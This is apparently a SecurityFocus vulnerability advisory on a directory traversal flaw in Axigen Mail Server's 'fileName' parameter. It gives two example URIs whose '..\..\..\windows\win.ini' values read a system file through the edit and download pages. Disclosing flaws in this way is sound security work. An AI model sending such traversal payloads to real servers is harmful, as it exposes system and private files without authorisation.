Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability

Attackers can exploit this issue through a browser.

The following example URIs are available:

http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini

http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini


 

Privacy Statement
Copyright 2010, SecurityFocus